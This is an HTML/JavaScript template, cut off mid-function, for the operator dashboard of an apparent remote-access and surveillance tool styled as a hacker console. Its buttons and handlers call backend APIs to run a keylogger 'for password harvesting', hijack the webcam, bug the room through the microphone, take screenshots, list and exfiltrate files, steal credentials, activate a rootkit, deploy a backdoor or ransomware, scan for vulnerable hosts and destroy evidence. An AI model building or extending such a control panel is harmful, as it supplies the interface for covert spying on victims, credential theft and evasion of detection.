{% extends "base.html" %}

{% block content %}
<canvas id="matrix-bg" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; opacity: 0.15;"></canvas>

<script>
    // Matrix digital rain effect
    document.addEventListener('DOMContentLoaded', function() {
        const canvas = document.getElementById('matrix-bg');
        const ctx = canvas.getContext('2d');
        
        canvas.width = window.innerWidth;
        canvas.height = window.innerHeight;
        
        const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@#$%^&*()_+-=[]{}|;:,.<>/?~`';
        const fontSize = 14;
        const columns = canvas.width / fontSize;
        
        const drops = [];
        for (let i = 0; i < columns; i++) {
            drops[i] = Math.floor(Math.random() * canvas.height / fontSize);
        }
        
        function draw() {
            ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
            ctx.fillRect(0, 0, canvas.width, canvas.height);
            
            ctx.fillStyle = '#ff0033';
            ctx.font = fontSize + 'px monospace';
            
            for (let i = 0; i < drops.length; i++) {
                const text = characters.charAt(Math.floor(Math.random() * characters.length));
                ctx.fillText(text, i * fontSize, drops[i] * fontSize);
                
                if (drops[i] * fontSize > canvas.height && Math.random() > 0.975) {
                    drops[i] = 0;
                }
                
                drops[i]++;
            }
        }
        
        setInterval(draw, 33);
        
        window.addEventListener('resize', function() {
            canvas.width = window.innerWidth;
            canvas.height = window.innerHeight;
        });
    });
</script>
<style>
   .glitch-text {
     position: relative;
     animation: glitch 1s linear infinite;
     text-shadow: 0 0 5px #ff0033;
   }
   
   @keyframes glitch {
     0% { transform: translate(0) }
     20% { transform: translate(-2px, 2px) }
     40% { transform: translate(-2px, -2px) }
     60% { transform: translate(2px, 2px) }
     80% { transform: translate(2px, -2px) }
     100% { transform: translate(0) }
   }
   
   .glitch-container:hover .glitch-text {
     animation: glitch 0.3s linear infinite;
   }
   
   .scanning-line {
     transition: opacity 0.3s ease;
   }
   
   .card-header.glitch-header {
     position: relative;
     overflow: hidden;
   }
   
   .btn {
      animation: pulsate 1.5s ease-in-out infinite alternate;
      box-shadow: 0 0 5px #ff0033;
      position: relative;
      overflow: hidden;
      transition: all 0.3s ease;
    }
    
    .btn:hover {
      background-color: #0a0a0a !important;
      color: #ff0033 !important;
      border-color: #ff0033 !important;
    }
    
    .btn:hover::after {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: linear-gradient(90deg, transparent, rgba(255, 0, 51, 0.2), transparent);
      animation: scan-button 1.5s linear infinite;
    }
    
    @keyframes scan-button {
      0% { left: -100%; }
      100% { left: 100%; }
    }
    
    @keyframes pulsate {
      0% {
        box-shadow: 0 0 5px #ff0033;
      }
      100% {
        box-shadow: 0 0 15px #ff0033, 0 0 30px rgba(255, 0, 51, 0.5);
      }
    }
   
   .card-header.glitch-header::before {
     content: '';
     position: absolute;
     top: 0;
     left: -100%;
     width: 50%;
     height: 100%;
     background: linear-gradient(90deg, transparent, rgba(255,0,51,0.2), transparent);
     animation: glitch-header 3s ease-in-out infinite;
   }
   
   @keyframes glitch-header {
     0% { left: -100%; }
     100% { left: 100%; }
   }
   
   .intense-glitch {
     animation: intense-glitch 0.8s cubic-bezier(.25, .46, .45, .94) both infinite;
   }
   
   @keyframes intense-glitch {
     0% {
       transform: translate(0);
       text-shadow: 0 0 5px #ff0033;
     }
     10% {
       transform: translate(-2px, -2px);
       text-shadow: -2px 0 #00ffff, 2px 2px #ff00ff;
     }
     20% {
       transform: translate(2px, 2px);
       text-shadow: 2px -2px #00ffff, -2px 2px #ff00ff;
     }
     30% {
       transform: translate(-1px, 2px);
       text-shadow: 2px 2px #00ffff, -2px -2px #ff00ff;
     }
     40% {
       transform: translate(1px, -1px);
       text-shadow: -2px -2px #00ffff, 2px 2px #ff00ff;
     }
     50% {
       transform: translate(0);
       text-shadow: 0 0 5px #ff0033;
     }
     100% {
       transform: translate(0);
       text-shadow: 0 0 5px #ff0033;
     }
   }
 </style>
<div class="row mb-4">
    <div class="col-12 text-center">
        <h1 class="mb-2 glitch-container" style="color: #ff0033; text-shadow: 0 0 10px #ff0033; font-family: 'VT323', monospace; animation: flicker 2s linear infinite;">
            <i class="fas fa-skull-crossbones me-3"></i><span class="glitch-text">Persistence Module</span> <span class="cursor"></span>
        </h1>
        <style>
            @keyframes flicker {
                0%, 19.999%, 22%, 62.999%, 64%, 64.999%, 70%, 100% {
                    opacity: 1;
                    text-shadow: 0 0 10px #ff0033, 0 0 20px #ff0033;
                }
                20%, 21.999%, 63%, 63.999%, 65%, 69.999% {
                    opacity: 0.4;
                    text-shadow: none;
                }
            }
        </style>
        <p style="color: #666; font-family: 'Courier New', monospace; text-transform: uppercase; letter-spacing: 1px;">ADVANCED SYSTEM COMPROMISE & PERSISTENCE OPERATIONS</p>
        <div class="alert glitch-container" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; font-family: 'Courier New', monospace; position: relative; overflow: hidden;">
            <i class="fas fa-radiation me-2"></i>
            <strong class="glitch-text">SYSTEM COMPROMISED:</strong> FULL ROOT ACCESS ACHIEVED. PERSISTENCE MECHANISMS ACTIVE.
            <div style="position: absolute; top: 0; left: 0; right: 0; bottom: 0; background: linear-gradient(90deg, transparent 0%, rgba(255,0,51,0.1) 50%, transparent 100%); animation: scan-line 2s linear infinite; pointer-events: none;"></div>
        </div>
        <style>
            @keyframes scan-line {
                0% { transform: translateX(-100%); }
                100% { transform: translateX(100%); }
            }
        </style>
        <div class="row">
            <div class="col-md-4">
                <div class="badge fs-6 mb-2 glitch-container" style="background-color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-crosshairs me-1"></i><span class="glitch-text">System Compromised</span>
                </div>
            </div>
            <div class="col-md-4">
                <div class="badge fs-6 mb-2 glitch-container" style="background-color: #333; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-satellite-dish me-1"></i><span class="glitch-text">C2 Channel Encrypted</span>
                </div>
            </div>
            <div class="col-md-4">
                <div class="badge fs-6 mb-2 glitch-container" style="background-color: #333; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-user-secret me-1"></i><span class="glitch-text">Anti-Forensics Active</span>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Surveillance Controls -->
<div class="row mb-4">
    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #ff0033; color: #ffffff;">
                <h6 class="card-title mb-0" style="text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-keyboard me-2"></i><span class="intense-glitch">Keylogger Module</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">CAPTURE ALL KEYSTROKES FOR PASSWORD HARVESTING</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleKeylogger('start')">
                        <i class="fas fa-play me-1"></i>Activate Keylogger
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #666; border: 1px solid #333; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleKeylogger('stop')">
                        <i class="fas fa-stop me-1"></i>Deactivate Keylogger
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #666; border: 1px solid #333; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleKeylogger('status')">
                        <i class="fas fa-info me-1"></i>Check Status
                    </button>
                </div>
                <div id="keylogger-status" class="mt-2 small" style="color: #ff0033; font-family: 'Courier New', monospace;">READY TO CAPTURE CREDENTIALS</div>
            </div>
        </div>
    </div>

    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-video me-2"></i><span class="intense-glitch">Visual Surveillance</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">COVERT CAMERA ACCESS AND SCREEN MONITORING</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="accessWebcam()">
                        <i class="fas fa-camera me-1"></i>Hijack Webcam
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="takeScreenshot()">
                        <i class="fas fa-desktop me-1"></i>Capture Screen
                    </button>
                </div>
                <div id="webcam-status" class="mt-2 small" style="color: #666; font-family: 'Courier New', monospace;">SURVEILLANCE MODULES READY</div>
            </div>
        </div>
    </div>

    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-microphone me-2"></i><span class="intense-glitch">Audio Surveillance</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">COVERT MICROPHONE ACTIVATION FOR ROOM BUGGING</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="accessMicrophone()">
                        <i class="fas fa-microphone me-1"></i>Activate Room Bug
                    </button>
                </div>
                <div id="microphone-status" class="mt-2 small" style="color: #666; font-family: 'Courier New', monospace;">AUDIO CAPTURE READY</div>
            </div>
        </div>
    </div>
</div>

<!-- Advanced File Operations -->
<div class="row mb-4">
    <div class="col-12">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-folder-open me-2"></i><span class="intense-glitch">File System Manipulation</span>
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <div class="row">
                    <div class="col-md-6">
                        <div class="mb-3">
                            <label class="form-label" style="color: #ff0033; font-family: 'Courier New', monospace;">TARGET DIRECTORY</label>
                            <div class="input-group">
                                <input type="text" class="form-control" id="directory-path" value="." placeholder="Enter target path" style="background-color: #0a0a0a; color: #cccccc; border-color: #333; font-family: 'Courier New', monospace;">
                                <button class="btn" style="background-color: #ff0033; color: #ffffff; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="listDirectory()">
                                    <i class="fas fa-search me-1"></i>Scan
                                </button>
                            </div>
                        </div>
                        
                        <div class="mb-3">
                            <div class="btn-group w-100">
                                <button class="btn" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="createFile()">
                                    <i class="fas fa-plus me-1"></i>Plant File
                                </button>
                                <button class="btn" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="downloadFile()">
                                    <i class="fas fa-download me-1"></i>Exfiltrate
                                </button>
                                <button class="btn" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="deleteFile()">
                                    <i class="fas fa-trash me-1"></i>Destroy
                                </button>
                            </div>
                        </div>
                    </div>
                    
                    <div class="col-md-6">
                        <div class="mb-3">
                            <label class="form-label" style="color: #ff0033; font-family: 'Courier New', monospace;">TARGET FILE</label>
                            <input type="text" class="form-control" id="selected-file" placeholder="No target selected" style="background-color: #0a0a0a; color: #cccccc; border-color: #333; font-family: 'Courier New', monospace;">
                        </div>
                    </div>
                </div>
                
                <div id="file-browser" class="mt-3">
                    <div class="text-center" style="color: #666;">
                        <i class="fas fa-folder fa-3x mb-3" style="color: #ff0033;"></i>
                        <p style="font-family: 'Courier New', monospace;">CLICK "SCAN" TO EXPLORE TARGET FILE SYSTEM</p>
                        <div class="mt-3 scanning-text" style="color: #ff0033; font-family: 'Courier New', monospace;">
                            <div class="scanning-line">SCANNING FILE SYSTEM...</div>
                            <div class="scanning-line">IDENTIFYING SENSITIVE DATA...</div>
                            <div class="scanning-line">PREPARING EXFILTRATION CHANNELS...</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Advanced Capabilities -->
<div class="row mb-4">
    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-download me-2"></i><span class="intense-glitch">Data Theft Module</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">EXTRACT SENSITIVE DATA FROM COMPROMISED SYSTEM</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="collectData('system_info')">
                        <i class="fas fa-server me-1"></i>Steal System Info
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="collectData('browser_data')">
                        <i class="fas fa-globe me-1"></i>Extract Credentials
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="collectData('file_search')">
                        <i class="fas fa-search me-1"></i>Find Sensitive Files
                    </button>
                </div>
                <div id="data-collection-status" class="mt-2 small" style="color: #666; font-family: 'Courier New', monospace;">THEFT MODULES READY</div>
            </div>
        </div>
    </div>

    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-user-secret me-2"></i><span class="intense-glitch">Anti-Detection Module</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">EVADE ANTIVIRUS AND SECURITY MONITORING</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleStealth('enable')">
                        <i class="fas fa-eye-slash me-1"></i>Activate Rootkit
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #666; border: 1px solid #333; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleStealth('disable')">
                        <i class="fas fa-eye me-1"></i>Deactivate Rootkit
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #666; border: 1px solid #333; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="toggleStealth('status')">
                        <i class="fas fa-info me-1"></i>Check Status
                    </button>
                </div>
                <div id="stealth-status" class="mt-2 small" style="color: #666; font-family: 'Courier New', monospace;">ROOTKIT READY FOR DEPLOYMENT</div>
            </div>
        </div>
    </div>

    <div class="col-md-4">
        <div class="card" style="border: 1px solid #ff0033; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #ff0033; color: #ffffff;">
                <h6 class="card-title mb-0" style="text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-rocket me-2"></i><span class="intense-glitch">Malware Deployment</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <p class="card-text small" style="font-family: 'Courier New', monospace; color: #666;">DEPLOY ADVANCED MALWARE PAYLOADS</p>
                <div class="d-grid gap-2">
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="deployPayload('backdoor')">
                        <i class="fas fa-door-open me-1"></i>Install Backdoor
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="deployPayload('keylogger')">
                        <i class="fas fa-keyboard me-1"></i>Deploy Keylogger
                    </button>
                    <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="deployPayload('scanner')">
                        <i class="fas fa-search me-1"></i>Launch Ransomware
                    </button>
                </div>
                <div id="payload-status" class="mt-2 small" style="color: #ff0033; font-family: 'Courier New', monospace;">MALWARE MODULES READY</div>
            </div>
        </div>
    </div>
</div>

<!-- Network Analysis -->
<div class="row mb-4">
    <div class="col-md-6">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-network-wired me-2"></i><span class="intense-glitch">Network Infiltration</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <button class="btn w-100 mb-3" style="background-color: #ff0033; color: #ffffff; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="scanNetwork()">
                    <i class="fas fa-radar me-1"></i>Scan For Vulnerable Hosts
                </button>
                <div id="network-devices">
                    <div class="text-center" style="color: #666;">
                        <i class="fas fa-wifi fa-2x mb-2" style="color: #ff0033;"></i>
                        <p class="small" style="font-family: 'Courier New', monospace;">CLICK "SCAN" TO IDENTIFY VULNERABLE TARGETS</p>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="col-md-6">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header glitch-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-cog me-2"></i><span class="intense-glitch">Persistence Mechanisms</span>
                </h6>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <button class="btn w-100 mb-3" style="background-color: #ff0033; color: #ffffff; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="checkPersistence()">
                    <i class="fas fa-search me-1"></i>Install Persistence Hooks
                </button>
                <div id="persistence-info">
                    <div class="text-center" style="color: #666;">
                        <i class="fas fa-shield-alt fa-2x mb-2" style="color: #ff0033;"></i>
                        <p class="small" style="font-family: 'Courier New', monospace;">MAINTAIN ACCESS AFTER SYSTEM REBOOT</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Activity Log -->
<div class="row">
    <div class="col-12">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header glitch-header d-flex justify-content-between align-items-center" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h6 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;">
                    <i class="fas fa-clipboard-list me-2"></i><span class="intense-glitch">Attack Log</span>
                </h6>
                <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="clearActivityLog()">
                    <i class="fas fa-trash me-1"></i><span class="glitch-text">Destroy Evidence</span>
                </button>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc;">
                <div id="activity-log" style="max-height: 200px; overflow-y: auto; background: #0a0a0a; color: #ff0033; padding: 10px; border-radius: 5px; border: 1px solid #333; font-family: 'Courier New', monospace;">
                    <div style="color: #666;">ATTACK LOG INITIALIZED...</div>
                    <div class="text-danger">[12:01:32] System compromised - Root access obtained</div>
                    <div class="text-danger">[12:01:45] Anti-forensics measures deployed</div>
                    <div class="text-danger">[12:02:10] Persistence mechanisms installed</div>
                    <div class="text-danger">[12:02:38] Network reconnaissance complete</div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
function logActivity(message, level = 'info') {
    const log = document.getElementById('activity-log');
    const timestamp = new Date().toLocaleTimeString();
    const levelClass = level === 'error' ? 'text-danger' : level === 'warning' ? 'text-warning' : 'text-danger';
    
    const entry = document.createElement('div');
    entry.className = `mb-1 ${levelClass}`;
    entry.style.fontFamily = "'Courier New', monospace";
    entry.innerHTML = `[${timestamp}] ${message}`;
    
    log.appendChild(entry);
    log.scrollTop = log.scrollHeight;
}

function clearActivityLog() {
    document.getElementById('activity-log').innerHTML = '<div class="text-muted">Activity log cleared...</div>';
}

function toggleKeylogger(action) {
    fetch('/api/keylogger', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ action: action })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('keylogger-status').innerHTML = `<span class="text-success">${data.message}</span>`;
            logActivity(`Keylogger: ${data.message}`, 'info');
        } else {
            document.getElementById('keylogger-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Keylogger error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Keylogger network error: ${error.message}`, 'error');
    });
}

function accessWebcam() {
    fetch('/api/webcam_access')
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('webcam-status').innerHTML = `<span class="text-success">${data.message}</span>`;
            logActivity(`Webcam: ${data.message}`, 'info');
        } else {
            document.getElementById('webcam-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Webcam error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Webcam network error: ${error.message}`, 'error');
    });
}

function accessMicrophone() {
    fetch('/api/microphone_access')
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('microphone-status').innerHTML = `<span class="text-success">${data.message}</span>`;
            logActivity(`Microphone: ${data.message}`, 'info');
        } else {
            document.getElementById('microphone-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Microphone error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Microphone network error: ${error.message}`, 'error');
    });
}

function listDirectory() {
    const path = document.getElementById('directory-path').value;
    
    fetch('/api/file_operations', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ operation: 'list_directory', path: path })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            let html = `<div class="table-responsive">
                <table class="table table-sm table-striped">
                    <thead>
                        <tr>
                            <th>Name</th>
                            <th>Type</th>
                            <th>Size</th>
                            <th>Modified</th>
                            <th>Actions</th>
                        </tr>
                    </thead>
                    <tbody>`;
            
            data.items.forEach(item => {
                const sizeStr = item.type === 'directory' ? '-' : formatBytes(item.size);
                html += `<tr>
                    <td><i class="fas fa-${item.type === 'directory' ? 'folder' : 'file'} me-1"></i>${item.name}</td>
                    <td>${item.type}</td>
                    <td>${sizeStr}</td>
                    <td>${new Date(item.modified).toLocaleString()}</td>
                    <td>
                        <button class="btn btn-outline-primary btn-sm" onclick="selectFile('${item.path}')">
                            <i class="fas fa-hand-pointer"></i>
                        </button>
                    </td>
                </tr>`;
            });
            
            html += '</tbody></table></div>';
            document.getElementById('file-browser').innerHTML = html;
            logActivity(`Listed directory: ${data.current_path}`, 'info');
        } else {
            document.getElementById('file-browser').innerHTML = `<div class="alert alert-danger">${data.error}</div>`;
            logActivity(`Directory listing error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Directory listing network error: ${error.message}`, 'error');
    });
}

function selectFile(path) {
    document.getElementById('selected-file').value = path;
    logActivity(`Selected file: ${path}`, 'info');
}

function scanNetwork() {
    document.getElementById('network-devices').innerHTML = '<div class="text-center"><i class="fas fa-spinner fa-spin"></i> Scanning network...</div>';
    
    fetch('/api/network_scan')
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            let html = `<div class="small mb-2">Network: ${data.network}</div>`;
            
            if (data.devices.length > 0) {
                html += '<div class="list-group list-group-flush">';
                data.devices.forEach(device => {
                    html += `<div class="list-group-item d-flex justify-content-between align-items-center">
                        <div>
                            <strong>${device.hostname}</strong><br>
                            <small class="text-muted">${device.ip}</small>
                        </div>
                        <span class="badge bg-success">Active</span>
                    </div>`;
                });
                html += '</div>';
            } else {
                html += '<div class="text-muted">No active devices found</div>';
            }
            
            document.getElementById('network-devices').innerHTML = html;
            logActivity(`Network scan completed: ${data.devices.length} devices found`, 'info');
        } else {
            document.getElementById('network-devices').innerHTML = `<div class="alert alert-danger">${data.error}</div>`;
            logActivity(`Network scan error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Network scan error: ${error.message}`, 'error');
    });
}

function checkPersistence() {
    document.getElementById('persistence-info').innerHTML = '<div class="text-center"><i class="fas fa-spinner fa-spin"></i> Analyzing persistence...</div>';
    
    fetch('/api/persistence_check')
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            let html = `<div class="small mb-2">System: ${data.system}</div>`;
            html += `<div class="alert alert-info small">${data.persistence.note}</div>`;
            
            if (data.persistence.startup_programs.length > 0) {
                html += '<strong class="small">Startup Programs:</strong><ul class="small">';
                data.persistence.startup_programs.forEach(prog => {
                    html += `<li>${prog.name} - ${prog.enabled ? 'Enabled' : 'Disabled'}</li>`;
                });
                html += '</ul>';
            }
            
            document.getElementById('persistence-info').innerHTML = html;
            logActivity(`Persistence analysis completed for ${data.system}`, 'info');
        } else {
            document.getElementById('persistence-info').innerHTML = `<div class="alert alert-danger">${data.error}</div>`;
            logActivity(`Persistence analysis error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Persistence analysis error: ${error.message}`, 'error');
    });
}

function createFile() {
    const path = prompt('Enter file path:');
    const content = prompt('Enter file content:');
    
    if (path && content !== null) {
        fetch('/api/file_operations', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({ operation: 'create_file', path: path, content: content })
        })
        .then(response => response.json())
        .then(data => {
            if (data.success) {
                logActivity(`File created: ${path}`, 'info');
                listDirectory(); // Refresh directory listing
            } else {
                logActivity(`File creation failed: ${data.error}`, 'error');
            }
        })
        .catch(error => {
            logActivity(`File creation error: ${error.message}`, 'error');
        });
    }
}

function downloadFile() {
    const path = document.getElementById('selected-file').value;
    if (!path) {
        alert('Please select a file first');
        return;
    }
    
    fetch('/api/file_operations', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ operation: 'download_file', path: path })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            const link = document.createElement('a');
            link.href = 'data:application/octet-stream;base64,' + data.content;
            link.download = data.filename;
            link.click();
            logActivity(`File downloaded: ${data.filename}`, 'info');
        } else {
            logActivity(`Download failed: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Download error: ${error.message}`, 'error');
    });
}

function deleteFile() {
    const path = document.getElementById('selected-file').value;
    if (!path) {
        alert('Please select a file first');
        return;
    }
    
    if (confirm(`Are you sure you want to delete: ${path}?`)) {
        // This would implement file deletion - simulated for security
        logActivity(`File deletion simulated: ${path}`, 'warning');
        alert('File deletion simulated (not actually deleted for security)');
    }
}

function takeScreenshot() {
    fetch('/api/screenshot')
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            const modal = document.createElement('div');
            modal.innerHTML = `
                <div class="modal fade" id="screenshotModal" tabindex="-1">
                    <div class="modal-dialog modal-xl">
                        <div class="modal-content">
                            <div class="modal-header">
                                <h5 class="modal-title">Screenshot Captured</h5>
                                <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                            </div>
                            <div class="modal-body text-center">
                                <img src="${data.image}" class="img-fluid" style="max-height: 70vh;">
                            </div>
                        </div>
                    </div>
                </div>
            `;
            document.body.appendChild(modal);
            const modalInstance = new bootstrap.Modal(document.getElementById('screenshotModal'));
            modalInstance.show();
            logActivity('Screenshot captured', 'info');
        } else {
            logActivity(`Screenshot failed: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Screenshot error: ${error.message}`, 'error');
    });
}

function formatBytes(bytes) {
